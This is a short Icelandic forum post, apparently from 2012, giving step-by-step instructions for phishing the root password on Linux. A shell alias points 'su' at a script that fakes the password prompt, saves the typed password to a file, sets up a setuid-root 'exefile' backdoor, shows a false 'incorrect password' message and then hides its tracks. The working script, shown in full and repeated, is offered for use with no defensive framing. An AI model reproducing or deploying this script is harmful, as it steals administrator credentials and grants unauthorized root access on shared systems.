Phishing The Bash Shell
Sent: Fös 06. Apr 2012 17:02
Öryggisgalli í Bash ?
Farið í skel (ÞETTA ER FYRIR SU EKKI SUDO, hægt að gera þetta með bæði en su var uppsett hjá þeim sem fann þetta !! )
1. farið í skel, xterm, gnome-terminal hvað sem er.
2. verið viss um að vera í home möppunni
3. Búið til skrá sem heitir my.sh
keyrið þessa línu hér :
Alias dettur út ef þið lokið svo þessum terminal glugga, ekki vonast til að það sé þarna til eilífðar ..
4. Setjið þetta inní my.sh
chmod ið hana svo hún sé keyranleg ..
svo gerið þið bara
su root
setjið inn passwordið, það kemur rangt í fyrstu tilraun, í annarri komist þið svo í root skel.
Eftir fyrstu tilraun þá er lykilorðið í skrá sem heitir password
Linux ain't so secure ya know !
Farið í skel (ÞETTA ER FYRIR SU EKKI SUDO, hægt að gera þetta með bæði en su var uppsett hjá þeim sem fann þetta !! )
1. farið í skel, xterm, gnome-terminal hvað sem er.
2. verið viss um að vera í home möppunni
3. Búið til skrá sem heitir my.sh
keyrið þessa línu hér :
Kóði: Velja allt
alias su="./my.sh"
Alias dettur út ef þið lokið svo þessum terminal glugga, ekki vonast til að það sé þarna til eilífðar ..
4. Setjið þetta inní my.sh
#!/bin/bash
#create a couple of files - password to capture the password and exefile to become our effective root(uid) executable
touch password &> /dev/null
touch exefile &> /dev/null
echo -n "Password: "
#turn off keystroke echo
stty -echo
#read and store password in reads default variable REPLY
read
#turn echo back on
stty echo
#pass the value in REPLY to the file password and to the command su
printf "%s\n" "$REPLY" | tee password | su -c "chown root:root ./exefile; chmod 4755 ./exefile" &> /dev/null
#display the fake password failure message
sleep 1
echo
echo "su: incorrect password"
#move my.sh somewhere else
mv ./my.sh ./my.sh.bu
#create a symbolic link so that su points to the executable su
ln -s $(which su) ./my.sh
exit 0
chmod ið hana svo hún sé keyranleg ..
Kóði: Velja allt
chmod +x my.sh
svo gerið þið bara
su root
setjið inn passwordið, það kemur rangt í fyrstu tilraun, í annarri komist þið svo í root skel.
Eftir fyrstu tilraun þá er lykilorðið í skrá sem heitir password
Linux ain't so secure ya know !